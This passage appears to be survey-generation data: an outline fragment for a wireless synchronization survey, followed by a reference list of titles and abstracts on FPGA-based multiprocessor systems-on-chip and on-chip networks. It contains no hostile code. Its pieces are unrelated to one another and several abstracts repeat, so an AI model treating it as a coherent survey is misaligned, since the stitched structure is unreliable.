Section 5: MULTICELL/MULTIUSER COMMUNICATION SYSTEMS
Description 5: Analyze the synchronization challenges, literature review, and summary in multiuser/multicell communication systems, including SC-FDMA, OFDMA uplink communication, CDMA communication, cognitive radio-based communication, distributed multiuser communication, CoMP-based communication, and multicell interference-based communication systems.
Section 6: UWB AND NON-CDMA BASED SPREAD SPECTRUM COMMUNICATION SYSTEMS
Description 6: Detail the system models, synchronization challenges, literature review, and summary for ultra-wideband (UWB) communication systems and non-CDMA based spread spectrum communication systems.
Section 7: FUTURE DIRECTIONS
Description 7: Discuss anticipated trends and promising directions for future research in synchronization for wireless communication systems, such as millimeter-wave and terahertz frequencies, massive MIMO, full-duplex communications, RF energy harvesting, vehicular communications, cognitive radio networks, and satellite systems.
Section 8: CONCLUSIONS
Description 8: Summarize the main findings of the survey, emphasize key contributions such as the classification tables, and outline future research directions.
Reconfigurable Multiprocessor Systems: A Review
11
--- paper_title: Multiprocessor System-on-Chip (MPSoC) Technology paper_content: The multiprocessor system-on-chip (MPSoC) uses multiple CPUs along with other hardware subsystems to implement a system. A wide range of MPSoC architectures have been developed over the past decade. This paper surveys the history of MPSoCs to argue that they represent an important and distinct category of computer architecture. We consider some of the technological trends that have driven the design of MPSoCs. We also survey computer-aided design problems relevant to the design of MPSoCs. --- paper_title: An automated exploration framework for FPGA-based soft multiprocessor systems paper_content: FPGA-based soft multiprocessors are viable system solutions for high performance applications. They provide a software abstraction to enable quick implementations on the FPGA. The multiprocessor can be customized for a target application to achieve high performance. Modern FPGAs provide the capacity to build a variety of micro-architectures composed of 20-50 processors, complex memory hierarchies, heterogeneous interconnection schemes and custom co-processors for performance critical operations. However, the diversity in the architectural design space makes it difficult to realize the performance potential of these systems. In this paper we develop an exploration framework to build efficient FPGA multiprocessors for a target application. Our main contribution is a tool based on Integer Linear Programming to explore micro-architectures and allocate application tasks to maximize throughput. Using this tool, we implement a soft multiprocessor for IPv4 packet forwarding that achieves a throughput of 2 Gbps, surpassing the performance of a carefully tuned hand design. --- paper_title: An FPGA-based soft multiprocessor system for IPv4 packet forwarding paper_content: To realize high performance, embedded applications are deployed on multiprocessor platforms tailored for an application domain. However, when a suitable platform is not available, only few application niches can justify the increasing costs of an IC product design. An alternative is to design the multiprocessor on an FPGA. This retains the programmability advantage, while obviating the risks in producing silicon. This also opens FPGAs to the world of software designers. In this paper, we demonstrate the feasibility of FPGA-based multiprocessors for high performance applications. We deploy IPv4 packet forwarding on a multiprocessor on the Xilinx Virtex-II Pro FPGA. The design achieves a 1.8 Gbps throughput and loses only 2.6X in performance (normalized to area) compared to an implementation on the Intel IXP-28OO network processor. We also develop a design space exploration framework using integer linear programming to explore multiprocessor configurations for an application. Using this framework, we achieve a more efficient multiprocessor design surpassing the performance of our hand-tuned solution for packet forwarding. --- paper_title: Advantages of FPGA-based multiprocessor systems in industrial applications paper_content: Today, industrial production machines must be highly flexible in order to competitively account for dynamic and unforeseen changes in the product demands. This paper shows that field-programmable gate arrays (FPGAs) are especially suited to fulfil these requirements; FPGAs are very powerful, relatively inexpensive, and adaptable, since their configuration is specified in an abstract hardware description language. 
In addition to the benefits resulting from using an FPGA, the case study presented here shows how FPGAs can be used for implementing a sophisticated multiprocessor architecture. In the course of presentation, this paper furthermore argues that due to the excellent tool support and the availability of reusable functional modules (also known as intellectual properties) this approach can be adopted by almost any industrial hardware designer. --- paper_title: An Adaptive Message Passing MPSoC Framework paper_content: Multiprocessor Systems-on-Chips (MPSoCs) offer superior performance while maintaining flexibility and reusability thanks to software oriented personalization. While most MPSoCs are today heterogeneous for better meeting the targeted application requirements, homogeneous MPSoCs may become in a near future a viable alternative bringing other benefits such as run-time load balancing and task migration. The work presented in this paper relies on a homogeneous NoC-based MPSoC framework we developed for exploring scalable and adaptive on-line continuous mapping techniques. Each processor of this system is compact and runs a tiny preemptive operating system that monitors various metrics and is entitled to take remapping decisions through code migration techniques. This approach that endows the architecture with decisional capabilities permits refining application implementation at run-time according to various criteria. Experiments based on simple policies are presented on various applications that demonstrate the benefits of such an approach. --- paper_title: Using Mpi: Portable Parallel Programming with the Message Passing Interface paper_content: This book offers a thoroughly updated guide to the MPI (Message-Passing Interface) standard library for writing programs for parallel computers. Since the publication of the previous edition of Using MPI, parallel computing has become mainstream. Today, applications run on computers with millions of processors; multiple processors sharing memory and multicore processors with multiple hardware threads per core are common. The MPI-3 Forum recently brought the MPI standard up to date with respect to developments in hardware capabilities, core language evolution, the needs of applications, and experience gained over the years by vendors, implementers, and users. This third edition of Using MPI reflects these changes in both text and example code. The book takes an informal, tutorial approach, introducing each concept through easy-to-understand examples, including actual code in C and Fortran. Topics include using MPI in simple programs, virtual topologies, MPI datatypes, parallel libraries, and a comparison of MPI with sockets. For the third edition, example code has been brought up to date; applications have been updated; and references reflect the recent attention MPI has received in the literature. A companion volume, Using Advanced MPI, covers more advanced topics, including hybrid programming and coping with large data. --- paper_title: A Multiprocessor System-on-Chip Implementation of a Laser-based Transparency Meter on an FPGA paper_content: Modern FPGAs are large enough to implement multi-processor systems-on-chip (MPSoCs). Commercial FPGA companies also provide system design tools that abstract sufficient low-level system details to allow non-FPGA experts to design these systems for new applications.
The application presented herein was designed by photomask researchers to implement a new technique for measuring the transparency of bimetallic grayscale masks using an FPGA platform. Production of the bimetallic grayscale masks requires a direct-write laser system. Previously, system calibration was determined by writing large rectangles of varying transparency on a mask and then measuring them using a spectrometer. The proposed technique uses the same mask-writing system but adds photodiode sensors connected to a multiprocessor computing system implemented on an FPGA. The added sensors combined with the laser beam's smaller focal point allows the calibration rectangles to be up to 5000 times smaller than those required by the spectrometer. This allows for direct mask verification on a μm-sized scale. Furthermore, the MPSoC design on the FPGA is easily scalable to support an increased number of photodiodes for the future addition of a feedback approach to the project. --- paper_title: A dual-priority real-time multiprocessor system on FPGA for automotive applications paper_content: This paper presents the implementation of a dual-priority scheduling algorithm for real-time embedded systems on a shared memory multiprocessor on FPGA. The dual-priority microkernel is supported by a multiprocessor interrupt controller to trigger periodic and aperiodic thread activation and manage context switching. We show how the dual-priority algorithm performs on a real system prototype compared to the theoretical performance simulations with a typical standard workload of automotive applications, underlining where the differences are. --- paper_title: Multiple Sequence Alignment on an FPGA paper_content: Molecular biologists frequently compute multiple sequence alignments (MSAs) to identify similar regions in protein families. Progressive alignment is a widely used approach to compute MSAs. However, aligning a few hundred sequences by popular progressive alignment tools requires several hours on sequential computers. Due to the rapid growth of biological sequence databases biologists have to compute MSAs in a far shorter time. In this paper we present a new approach to MSA on reconfigurable hardware platforms to gain high performance at low cost.
To derive an efficient mapping onto this type of architecture, fine-grained parallel processing elements (PEs) have been designed. Using this PE design as a building block we have constructed a linear systolic array to perform a pairwise sequence distance computation using dynamic programming. This results in an implementation with significant runtime savings on a standard off-the-shelf FPGA. --- paper_title: MPSoC design of RT control applications based on FPGA SoftCore processors paper_content: Field programmable gate array (FPGA) based controllers offer advantages such as high-speed complex functionality and low power consumption. According to the controller complexity, the FPGA design can be achieved by multiprocessor system on chip (MPSoC) architectures with mixed software/hardware solutions. The aim of this paper is to design full speed real time (RT) motor control drive algorithms for FPGA based MPSoC. To this purpose, a new approach is proposed to test controller design by implementing an RT motor emulator linked to its controller drive in the same FPGA target. The gain with using this new approach is the ability to push past the operational limits of a specific environment and to test fault conditions that would otherwise be damaging or dangerous for a real motor. The developed MPSoC architectures consist of two and three SoftCore (MicroBlaze) processors that are linked by FIFO style communication. The implementation results give an overview of MPSOC FPGA based controller benefits and illustrate the effect of interprocessor communication mode. --- paper_title: A parallel MPEG-4 encoder for FPGA based multiprocessor SoC paper_content: A parallel MPEG-4 simple profile encoder for FPGA based multiprocessor system-on-chip (SoC) is presented. The goal is a computationally scalable framework independent of platform. The scalability is achieved by spatial parallelization where images are divided into horizontal slices. Slice coding tasks are mapped to the multiprocessor consisting of four soft-cores arranged into master-slave configuration. Also, the shared memory model is adopted where large images are stored in shared external memory while small on-chip buffers are used for processing. The interconnections between memories and processors are realized with our HIBI network. Our main contributions are the scalable encoder framework as well as methods for coping with limited memory of FPGA. The current software only implementation processes 6 QCIF frames/s with three encoding slaves. In practice, speed-ups of 1.7 and 2.3 have been measured with two and three slaves, respectively. FPGA utilization of current implementation is 59% requiring 24 207 logic elements on Altera Stratix EP1S40. --- paper_title: An MPSoC architecture for the Multiple Target Tracking application in driver assistant system paper_content: This article discusses the design of an application specific MPSoC architecture dedicated to multiple target tracking (MTT). This application has its utility in driver assistant systems, more precisely in collision avoidance and warning systems. An automotive-radar is used as the front end sensor in our application. The article examines the tradeoffs that must be taken into consideration in the realization of the entire MTT application in an embedded system. In our implementation of MTT, several independent parallel tasks have been identified and mapped onto a multiprocessor architecture to ensure the deadlines imposed by the application. Our study demonstrates that the joint utilization of reconfigurable circuits (namely FPGA) and MPSoC facilitates the development of a flexible and efficient MTT system. --- paper_title: MPLEM: An 80-processor FPGA Based Multiprocessor System paper_content: Multiprocessor embedded systems (MESes) are a very promising approach for high performance yet relatively low-cost computing. At the same time modern FPGAs provide the silicon capacity to build multiprocessor systems containing 10-100 processors, complex memory systems, heterogeneous interconnection schemes and custom engines executing the performance-critical operations. In this work we present a MES implemented in a state-of-the-art FPGA consisting of up to eighty 32-bit processors. The efficiency of our approach is demonstrated by the fact that our system can execute the BLAST CPU-intensive application, which is the prevalent tool used by molecular biologists for DNA sequence matching and database search, many times faster than a simple PC. --- paper_title: Operating System for Symmetric Multiprocessors on FPGA paper_content: Soft-core based multiprocessor systems are getting very popular in the FPGA design world. There are many computer architectures that have been used for building multiprocessor systems on FPGAs, including SMP (symmetric multiprocessor).
One of the main drawbacks of these SMP systems is the unavailability of operating systems that allow programming multi-threaded applications that make good use of the multiple processors of the system. This paper details an operating system designed to be used with SMP systems based on the MicroBlaze soft-core processor. The OS is tested with three different applications on an SMP system which implements all the software and hardware required for the OS to work on different SMP systems. --- paper_title: Symmetric Multiprocessing on Programmable Chips Made Easy paper_content: Vendor-provided softcore processors often support advanced features such as caching that work well in uniprocessor or uncoupled multiprocessor architectures. However, it is a challenge to implement symmetric multiprocessor on a programmable chip (SMPoPC) systems using such processors. This paper presents an implementation of a tightly coupled, cache-coherent symmetric multiprocessing architecture using a vendor-provided softcore processor. Experimental results show that this implementation can be achieved without invasive changes to the vendor-provided softcore processor and without degradation of the performance of the memory system. --- paper_title: Exploring FPGA Capabilities for Building Symmetric Multiprocessor Systems paper_content: Advances in FPGA technologies allow designing highly complex systems using on-chip FPGA resources and intellectual property (IP) cores. Furthermore, it is possible to build multiprocessor systems using hard-core or soft-core processors increasing the range of applications that can be implemented on an FPGA. This paper presents an implementation of a symmetric multiprocessor (SMP) system on an FPGA using a vendor provided soft-core processor and a new set of software libraries specially developed for writing applications for this kind of systems. Experimental results show how this approach can improve performance of parallelizable software applications. --- paper_title: A Taxonomy of Reconfigurable Single-/Multiprocessor Systems-on-Chip paper_content: Runtime adaptivity of hardware in processor architectures is a novel trend, which is under investigation in a variety of research labs all over the world.
The runtime exchange of modules, implemented on a reconfigurable hardware, affects the instruction flow (e.g., in reconfigurable instruction set processors) or the data flow, which has a strong impact on the performance of an application. Furthermore, the choice of a certain processor architecture related to the class of target applications is a crucial point in application development. A simple example is the domain of high-performance computing applications found in meteorology or high-energy physics, where vector processors are the optimal choice. A classification scheme for computer systems was provided in 1966 by Flynn where single/multiple data and instruction streams were combined to four types of architectures. This classification is now used as a foundation for an extended classification scheme including runtime adaptivity as further degree of freedom for processor architecture design. The developed scheme is validated by a multiprocessor system implemented on reconfigurable hardware as well as by a classification of existing static and reconfigurable processor systems. --- paper_title: New dimensions for multiprocessor architectures: On demand heterogeneity, infrastructure and performance through reconfigurability — the RAMPSoC approach paper_content: Multiprocessor hardware architectures enable to distribute tasks of an application to several microprocessors, in order to exploit parallelism for accelerating the performance of computation. Especially for the application domain of image data processing, where computation performance is a crucial factor to keep the real-time requirements, this approach is a promising solution for the assembly of high sophisticated algorithms e.g. for object tracking. Changing requirements and the necessary implementation of the tasks in terms of modified algorithms, precision and communication needs to be handled by software and hardware adaptation in state of the art architectures. Field programmable gate arrays (FPGAs) enable to exploit the adaptation of hardware cores and the software running on embedded microprocessor cores on an integrated multiprocessor system. --- paper_title: Very high-speed computing systems paper_content: Very high-speed computers may be classified as follows: 1) Single Instruction Stream-Single Data Stream (SISD) 2) Single Instruction Stream-Multiple Data Stream (SIMD) 3) Multiple Instruction Stream-Single Data Stream (MISD) 4) Multiple Instruction Stream-Multiple Data Stream (MIMD). "Stream," as used here, refers to the sequence of data or instructions as seen by the machine during the execution of a program. The constituents of a system: storage, execution, and instruction handling (branching) are discussed with regard to recent developments and/or systems limitations. The constituents are discussed in terms of concurrent SISD systems (CDC 6600 series and, in particular, IBM Model 90 series), since multiple stream organizations usually do not require any more elaborate components. Representative organizations are selected from each class and the arrangement of the constituents is shown. --- paper_title: Parallel and flexible multiprocessor system-on-chip for adaptive automotive applications based on Xilinx MicroBlaze soft-cores paper_content: Xilinx Virtex FPGAs offer the possibility of dynamic and partial run-time reconfiguration. When designing a system that includes this feature it has to be made sure, that no signal lines cross the border to other reconfigurable regions. 
The complex modular design flow to generate partial bitstreams and the need for macros for the physical interconnection of IP cores make it necessary to investigate alternatives. This paper describes the design and implementation of a software reconfigurable multiprocessor system, based on Xilinx MicroBlaze softcore processors. A real application in the automotive domain implemented on a Xilinx Virtex-II 3000 FPGA is used to present results. --- paper_title: MPLEM: An 80-processor FPGA Based Multiprocessor System paper_content: Multiprocessor embedded systems (MESes) are a very promising approach for high performance yet relatively low-cost computing. At the same time modern FPGAs provide the silicon capacity to build multiprocessor systems containing 10-100 processors, complex memory systems, heterogeneous interconnection schemes and custom engines executing the performance-critical operations. In this work we present a MES implemented in a state-of-the-art FPGA consisting of up to eighty 32-bit processors. The efficiency of our approach is demonstrated by the fact that our system can execute the BLAST CPU-intensive application, which is the prevalent tool used by molecular biologists for DNA sequence matching and database search, many times faster than a simple PC. --- paper_title: Design and Implementation of a Resource-Efficient Communication Architecture for Multiprocessors on FPGAs paper_content: Recent significant advancements in FPGAs have made it viable to explore multiprocessor solutions on a single FPGA chip. An efficient communication architecture that matches the needs of the target application is always critical to the overall performance of multiprocessors. Packet-switching network-on-chip (NoC) approaches are being offered to deal with scalability and complexity challenges coming along with the increasing number of processing elements (PEs). Many FPGA-based NoC designs consume significant resources, leaving little room for PEs. We argue that computation is still the primary task of multiprocessors and sufficient resources should be reserved for PEs. This paper presents our novel design and implementation of a resource-efficient communication architecture for multiprocessors on FPGAs. We reduce not only the required number of routers for a given number of PEs by introducing a new PE-router topology, but also the resource requirements of each router, while maintaining good performance for typical injection rates. --- paper_title: External DDR2-constrained NOC-based 24-processors MPSOC design and implementation on single FPGA paper_content: Network on chip (NOC) has been proposed as the connection substrate of multiprocessor system on chip (SoC) due to the limited bandwidth of bus-based solutions. Although some designs are emerging, actual design experience with NOC-based multiprocessor systems on chip remains scarce, in contrast to simulation-based studies. However, implementation constraints clearly affect the design and modelling of a complex multiprocessor. In this paper we present the design and implementation of a multiprocessor system with 24 processors under the constraint of limited access to 4 external DDR2 memory banks. All the processors and DDR2 memories are connected to a network on chip through an open core protocol (OCP) interface. Multiple clock domains resulting from various IP complexities require a globally asynchronous locally synchronous (GALS) design methodology, which adds some extra area.
The multiprocessor system is fully implemented on a Xilinx Virtex-4 FX140 FPGA-based board and uses about 90% of the chip area. --- paper_title: HIBI-based multiprocessor SoC on FPGA paper_content: An FPGA offers an excellent platform for a system-on-chip consisting of intellectual property (IP) blocks. The problem is that IP blocks and their interconnections are often FPGA vendor dependent. Our HIBI (heterogeneous IP block interconnection) network-on-chip (NoC) scheme solves the problem by providing a flexible interconnection network and IP block integration with an open core protocol (OCP) interface. Therefore, IP components can be of any type: processors; hardware accelerators; communication interfaces; memories. As a proof of concept, a multiprocessor system with eight soft processor cores and HIBI is prototyped on FPGA. The whole system uses 36,402 logic elements, 2.9 Mbits of RAM, and operates at 78 MHz frequency on the Altera Stratix 1S40, which is comparable to other FPGA multiprocessors. The most important benefit is a significant reduction of the design effort compared to system-specific interconnection networks. HIBI also presents the first OCP-compliant IP-block integration in FPGA. --- paper_title: Evaluating Network-on-Chip for Homogeneous Embedded Multiprocessors in FPGAs paper_content: This paper presents a performance and area evaluation of a homogeneous multiprocessor communication system based on network-on-chip (NoC) in FPGA platforms. Two homogeneous chip multiprocessor proposals were designed and compared for Xilinx FPGAs using MicroBlaze processors: one based on NoC and the other based on shared memory/bus. One of the main findings is the communication performance evaluation of NoC for parallel computing applications. The comparison results show that an efficient implementation of NoC on FPGA can improve communication speed by up to seven times with low area overhead, according to the data size and the number of processors connected to the network. --- paper_title: Prototyping pipelined applications on a heterogeneous FPGA multiprocessor virtual platform paper_content: Multiprocessors on a chip are a reality these days. The semiconductor industry has recognized this approach as the most efficient in order to exploit chip resources, but the success of this paradigm heavily relies on the efficiency and widespread diffusion of parallel software. Among the many techniques to express the parallelism of applications, this paper focuses on pipelining, a technique well suited to data-intensive multimedia applications. We introduce a prototyping platform (FPGA-based) and a methodology for these applications. Our platform consists of a mix of standard and custom heterogeneous cores. We discuss several case studies, analyzing the interaction of the architecture and applications, and we show that multimedia and telecommunication applications with unbalanced pipeline stages can be easily deployed. Our framework eases the development cycle and enables the developers to focus directly on the problems posed by the programming model in the direction of the implementation of a production system. --- paper_title: Generic crossbar network on chip for FPGA MPSoCs paper_content: Networks-on-chip (NoCs) have emerged as a new design paradigm to implement MPSoCs that competes with the standard bus approach. They offer more scalability, flexibility, and bandwidth. Nevertheless, FPGA manufacturers still use the bus paradigm in their development frameworks.
In this paper, we study the complexity and performance of an FPGA implementation of a crossbar NoC. We propose a generic architecture and characterize its complexity, maximum frequency of operation, and global throughput for NoCs supporting 2 to 8 nodes. Results show that FPGA-based designs would benefit from such an architecture when high throughput must be reached. Finally, we present a fully functional 3×3 NoC interconnecting a PowerPC and 2 Xtensa processors implemented in a Virtex-II Pro FPGA. --- paper_title: A network on chip architecture and design methodology paper_content: We propose a packet-switched platform for single-chip systems which scales well to an arbitrary number of processor-like resources. The platform, which we call Network-on-Chip (NOC), includes both the architecture and the design methodology. The NOC architecture is an m×n mesh of switches, and resources are placed on the slots formed by the switches. We assume a direct layout of the 2-D mesh of switches and resources providing physical- and architectural-level design integration. Each switch is connected to one resource and four neighboring switches, and each resource is connected to one switch. A resource can be a processor core, memory, an FPGA, a custom hardware block or any other intellectual property (IP) block, which fits into the available slot and complies with the interface of the NOC. The NOC architecture essentially is the on-chip communication infrastructure comprising the physical layer, the data link layer and the network layer of the OSI protocol stack. We define the concept of a region, which occupies an area of any number of resources and switches. This concept allows the NOC to accommodate large resources such as large memory banks, FPGA areas, or special purpose computation resources such as high performance multi-processors. The NOC design methodology consists of two phases. In the first phase a concrete architecture is derived from the general NOC template. The concrete architecture defines the number of switches and shape of the network, the kind and shape of regions and the number and kind of resources. The second phase maps the application onto the concrete architecture to form a concrete product. --- paper_title: Symmetric Multiprocessing on Programmable Chips Made Easy paper_content: Vendor-provided softcore processors often support advanced features such as caching that work well in uniprocessor or uncoupled multiprocessor architectures. However, it is a challenge to implement symmetric multiprocessor on a programmable chip (SMPoPC) systems using such processors. This paper presents an implementation of a tightly coupled, cache-coherent symmetric multiprocessing architecture using a vendor-provided softcore processor. Experimental results show that this implementation can be achieved without invasive changes to the vendor-provided softcore processor and without degradation of the performance of the memory system. --- paper_title: Evaluating Large System-on-Chip on Multi-FPGA Platform paper_content: This paper presents a configurable base architecture tailorable for different applications. It allows a simple and rapid way to evaluate and prototype large Multi-Processor System-on-Chip architectures on multiple FPGAs with support for the Globally Asynchronous Locally Synchronous scheme. It allows early hardware/software co-verification and optimization.
The architecture abstracts the underlying hardware details from the processors so that knowledge about the exact locations of individual components are not required for communication. Implemented example architecture contains 58 IP blocks, including 35 Nios II soft processors. As a proof of concept, a MPEG-4 video encoder is run on the example architecture. --- paper_title: Multistage Interconnection Network for MPSoC: Performances study and prototyping on FPGA paper_content: Multiprocessor system on chip is a concept that aims to integrate multiple hardware and software in a chip. multistage interconnection network is considered as a promising solution for applications which use parallel architectures integrating a large number of processors and memories. in this paper, we present a model of multistage interconnection network and a design of prototyping on FPGA. This enabled the comparison of the proposed model with the full crossbar network, and the estimation of performance in terms of area, latency and energy consumption. The Multistage Interconnection Networks are well adapted to MPSoC architecture. They meet the needs of intensive signal processing and they are scalable to connect a large number of modules. --- paper_title: Star-Wheels Network-on-Chip featuring a self-adaptive mixed topology and a synergy of a circuit - and a packet-switching communication protocol paper_content: Multiprocessor System-on-Chip is a promising realization alternative for the next generation of computing architectures providing the required data processing performance in high performance computing applications. Numerous scientists from industry and academic institutions investigate and develop novel processing elements and accelerators as can be seen in real devices like IBM's Cell or nVIDIA's Tesla GPU. Nevertheless, the on-chip communication of these multiple processor elements has to be optimized tailored to the actual requirement of the data to be processed. Network-on-Chip (NoC), Bus-based or even heterogeneous communication on chip often suffer from the fact of being inflexible due to their fixed physical realization. This paper presents a novel approach for a NoC, exploiting circuit-and packed-switched communication as well as a run-time adaptive and heterogeneous topology. An application scenario from image processing exploiting the implemented NoC on an FPGA delivers results like performance data and hardware costs. --- paper_title: Exploring FPGA Capabilities for Building Symmetric Multiprocessor Systems paper_content: Advances in FPGA technologies allow designing highly complex systems using on-chip FPGA resources and intellectual property (IP) cores. Furthermore, it is possible to build multiprocessor systems using hard-core or soft-core processors increasing the range of applications that can be implemented on an FPGA. This paper presents an implementation of a symmetric multiprocessor (SMP) system on an FPGA using a vendor provided soft-core processor and a new set of software libraries specially developed for writing applications for this kind of systems. Experimental results show how this approach can improve performance of parallelizable software applications. --- paper_title: An Interrupt Controller for FPGA-based Multiprocessors paper_content: Interrupt-based programming is widely used for interfacing a processor with peripherals and allowing software threads to interact. Many hardware/software architectures have been proposed in the past to support this kind of programming practice. 
In the context of FPGA-based multiprocessors this topic has not yet been thoroughly addressed. This paper presents the architecture of an interrupt controller for an FPGA-based multiprocessor composed of standard off-the-shelf softcores. The main feature of this device is to distribute multiple interrupts across the cores of a multiprocessor. In addition, our architecture supports several advanced features like booking, broadcasting and inter-processor interrupts. On top of this hardware layer, we provide a software library to effectively exploit this mechanism. We realized a prototype of this system. Our experiments show that our interrupt controller efficiently distributes multiple interrupts on the system. --- paper_title: MPLEM: An 80-processor FPGA Based Multiprocessor System paper_content: Multiprocessor embedded systems (MESes) are a very promising approach for high performance yet relatively low-cost computing. At the same time modern FPGAs provide the silicon capacity to build multiprocessor systems containing 10-100 processors, complex memory systems, heterogeneous interconnection schemes and custom engines executing the performance-critical operations. In this work we present a MES implemented in a state-of-the-art FPGA consisting of up to eighty 32-bit processors. The efficiency of our approach is demonstrated by the fact that our system can execute the BLAST CPU-intensive application, which is the prevalent tool used by molecular biologists for DNA sequence matching and database search, many times faster than a simple PC. --- paper_title: External DDR2-constrained NOC-based 24-processors MPSOC design and implementation on single FPGA paper_content: Network on chip (NOC) has been proposed as the connection substrate of multiprocessor system on chip (SoC) due to the limited bandwidth of bus-based solutions. Although some designs are emerging, actual design experience with NOC-based multiprocessor systems on chip remains scarce, in contrast to simulation-based studies. However, implementation constraints clearly affect the design and modelling of a complex multiprocessor. In this paper we present the design and implementation of a multiprocessor system with 24 processors under the constraint of limited access to 4 external DDR2 memory banks. All the processors and DDR2 memories are connected to a network on chip through an open core protocol (OCP) interface. Multiple clock domains resulting from various IP complexities require a globally asynchronous locally synchronous (GALS) design methodology, which adds some extra area. The multiprocessor system is fully implemented on a Xilinx Virtex-4 FX140 FPGA-based board and uses about 90% of the chip area. --- paper_title: Lightweight DMA management mechanisms for multiprocessors on FPGA paper_content: This paper presents a multiprocessor system on FPGA that adopts Direct Memory Access (DMA) mechanisms to move data between the external memory and the local memory of each processor. The system integrates all standard DMA primitives via a fast Application Programming Interface (API) and relies on interrupts, with the additional possibility of managing a command list. This interface allows programming the embedded multiprocessor architecture on FPGA with simple DMAs using the same DMA techniques adopted on high-performance multiprocessors with complex DMA controllers. Several experiments demonstrate the performance of our solution, allowing a 57% improvement on the execution time of a selected set of benchmarks.
We furthermore show how some DMA programming techniques (double and multi-buffering) can be effectively used within our platform, thus easing the design and development of the hardware and the software in a reconfigurable DMA-based environment. --- paper_title: A Multiprocessor System-on-Chip Implementation of a Laser-based Transparency Meter on an FPGA paper_content: Modern FPGAs are large enough to implement multi-processor systems-on-chip (MPSoCs). Commercial FPGA companies also provide system design tools that abstract sufficient low-level system details to allow non-FPGA experts to design these systems for new applications. The application presented herein was designed by photomask researchers to implement a new technique for measuring the transparency of bimetallic grayscale masks using an FPGA platform. Production of the bimetallic grayscale masks requires a direct-write laser system. Previously, system calibration was determined by writing large rectangles of varying transparency on a mask and then measuring them using a spectrometer. The proposed technique uses the same mask-writing system but adds photodiode sensors connected to a multiprocessor computing system implemented on an FPGA. The added sensors combined with the laser beam's smaller focal point allows the calibration rectangles to be up to 5000 times smaller than those required by the spectrometer. This allows for direct mask verification on a mum-sized scale. Furthermore, the MPSoC design on the FPGA is easily scalable to support an increased number of photodiodes for the future addition of a feedback approach to the project. --- paper_title: An automated exploration framework for FPGA-based soft multiprocessor systems paper_content: FPGA-based soft multiprocessors are viable system solutions for high performance applications. They provide a software abstraction to enable quick implementations on the FPGA. The multiprocessor can be customized for a target application to achieve high performance. Modern FPGAs provide the capacity to build a variety of micro-architectures composed of 20-50 processors, complex memory hierarchies, heterogeneous interconnection schemes and custom co-processors for performance critical operations. However, the diversity in the architectural design space makes it difficult to realize the performance potential of these systems. In this paper we develop an exploration framework to build efficient FPGA multiprocessors for a target application. Our main contribution is a tool based on Integer Linear Programming to explore micro-architectures and allocate application tasks to maximize throughput. Using this tool, we implement a soft multiprocessor for IPv4 packet forwarding that achieves a throughput of 2 Gbps, surpassing the performance of a carefully tuned hand design. --- paper_title: An FPGA-based soft multiprocessor system for IPv4 packet forwarding paper_content: To realize high performance, embedded applications are deployed on multiprocessor platforms tailored for an application domain. However, when a suitable platform is not available, only few application niches can justify the increasing costs of an IC product design. An alternative is to design the multiprocessor on an FPGA. This retains the programmability advantage, while obviating the risks in producing silicon. This also opens FPGAs to the world of software designers. In this paper, we demonstrate the feasibility of FPGA-based multiprocessors for high performance applications. 
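As an aside on the double- and multi-buffering DMA techniques mentioned above: the core idea is to overlap the transfer of the next data chunk with computation on the current one. The following Python sketch only illustrates that overlap under assumed helper names (fetch, process, double_buffered); it is not the MicroBlaze DMA API described in the paper, and the worker thread merely stands in for a hardware DMA channel.

from concurrent.futures import ThreadPoolExecutor

def fetch(src, offset, size):
    # Stand-in for a DMA "get": copy a chunk of external memory into a local buffer.
    return src[offset:offset + size]

def process(buf):
    # Stand-in for the computation each core performs on its local buffer.
    return sum(buf)

def double_buffered(src, chunk):
    # Two buffers alternate implicitly: while one chunk is being processed,
    # the transfer of the next chunk is already in flight.
    results = []
    with ThreadPoolExecutor(max_workers=1) as dma:
        pending = dma.submit(fetch, src, 0, chunk)            # prime the first buffer
        for off in range(chunk, len(src) + chunk, chunk):
            current = pending.result()                        # wait for the in-flight transfer
            if off < len(src):
                pending = dma.submit(fetch, src, off, chunk)  # start the next transfer
            results.append(process(current))                  # compute overlaps the transfer
    return results

print(double_buffered(list(range(16)), 4))  # [6, 22, 38, 54]

With multi-buffering, more than one transfer is kept in flight; the same structure supports it by submitting additional fetches ahead of the compute loop.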
We deploy IPv4 packet forwarding on a multiprocessor on the Xilinx Virtex-II Pro FPGA. The design achieves a 1.8 Gbps throughput and loses only 2.6X in performance (normalized to area) compared to an implementation on the Intel IXP-2800 network processor. We also develop a design space exploration framework using integer linear programming to explore multiprocessor configurations for an application. Using this framework, we achieve a more efficient multiprocessor design surpassing the performance of our hand-tuned solution for packet forwarding. --- paper_title: A dual-priority real-time multiprocessor system on FPGA for automotive applications paper_content: This paper presents the implementation of a dual-priority scheduling algorithm for real-time embedded systems on a shared memory multiprocessor on FPGA. The dual-priority microkernel is supported by a multiprocessor interrupt controller to trigger periodic and aperiodic thread activation and manage context switching. We show how the dual-priority algorithm performs on a real system prototype compared to the theoretical performance simulations with a typical standard workload of automotive applications, underlining where the differences are. --- paper_title: MPSoC design of RT control applications based on FPGA SoftCore processors paper_content: Field programmable gate array (FPGA) based controllers offer advantages such as high-speed complex functionality and low power consumption. According to the controller complexity, the FPGA design can be achieved by multiprocessor system-on-chip (MPSoC) architectures with mixed software/hardware solutions. The aim of this paper is to design full-speed real-time (RT) motor control drive algorithms for an FPGA-based MPSoC. For this purpose, a new approach is proposed to test the controller design by implementing an RT motor emulator linked to its controller drive in the same FPGA target. The gain of using this new approach is the ability to push past the operational limits of a specific environment and to test fault conditions that would otherwise be damaging or dangerous for a real motor. The developed MPSoC architectures consist of two and three SoftCore (MicroBlaze) processors that are linked by FIFO-style communication. The implementation results give an overview of MPSoC FPGA-based controller benefits and illustrate the effect of the interprocessor communication mode. --- paper_title: A parallel MPEG-4 encoder for FPGA based multiprocessor SoC paper_content: A parallel MPEG-4 simple profile encoder for FPGA-based multiprocessor system-on-chip (SoC) is presented. The goal is a computationally scalable framework independent of platform. The scalability is achieved by spatial parallelization where images are divided into horizontal slices. Slice coding tasks are mapped to the multiprocessor consisting of four soft-cores arranged into a master-slave configuration. Also, the shared memory model is adopted, where large images are stored in shared external memory while small on-chip buffers are used for processing. The interconnections between memories and processors are realized with our HIBI network. Our main contributions are the scalable encoder framework as well as methods for coping with the limited memory of the FPGA. The current software-only implementation processes 6 QCIF frames/s with three encoding slaves. In practice, speed-ups of 1.7 and 2.3 have been measured with two and three slaves, respectively. FPGA utilization of the current implementation is 59%, requiring 24,207 logic elements on Altera Stratix EP1S40.
